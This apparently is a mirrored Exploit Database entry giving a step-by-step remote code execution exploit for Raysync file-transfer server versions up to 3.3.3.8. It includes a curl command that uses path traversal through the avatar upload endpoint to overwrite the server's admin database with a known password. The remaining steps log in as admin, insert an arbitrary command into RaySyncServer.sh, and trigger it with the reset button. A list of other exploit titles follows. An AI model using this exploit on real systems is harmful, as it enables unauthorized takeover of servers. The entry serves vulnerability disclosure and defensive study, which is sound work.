Raysync 3.3.3.8 – RCE

Exploit Database
13 阅读

作者： james

日期： 2020-12-16
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/49265/

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application on the local

environment, set admin password to 123456 , which will be write to

manage.db file.

step2: curl "file=@manage.db" http://[raysync
ip]/avatar?account=1&UserId=/../../../../config/manager.db

to override remote manage.db file in server.

step3: login in admin portal with admin/123456.

step4: create a normal file with all permissions in scope.

step5: modify RaySyncServer.sh ,add arbitrary evil command.

step6: trigger rce with clicking "reset" button

last Exploits
Raysync 3.3.3.8 – RCE的更多信息

Inscribe Webmedia – SQL Injection：
OSSIM 2.2 – Multiple Vulnerabilities：
Emby MediaServer 3.2.5 – Password Reset：
Photopad 1.2 – Multiple Cross-Site Scripting Vulnerabilities：
Cerb 7.0.3 – Cross-Site Request Forgery：
Blueimp’s jQuery File Upload 9.22.0 – Arbitrary File Upload Exploit：
Joomla! Component com_mtree 2.1.6 – Overwrite Cross-Site Request Forgery：
Inout SmartDeal 1.0 Script – Improper Access Restrictions：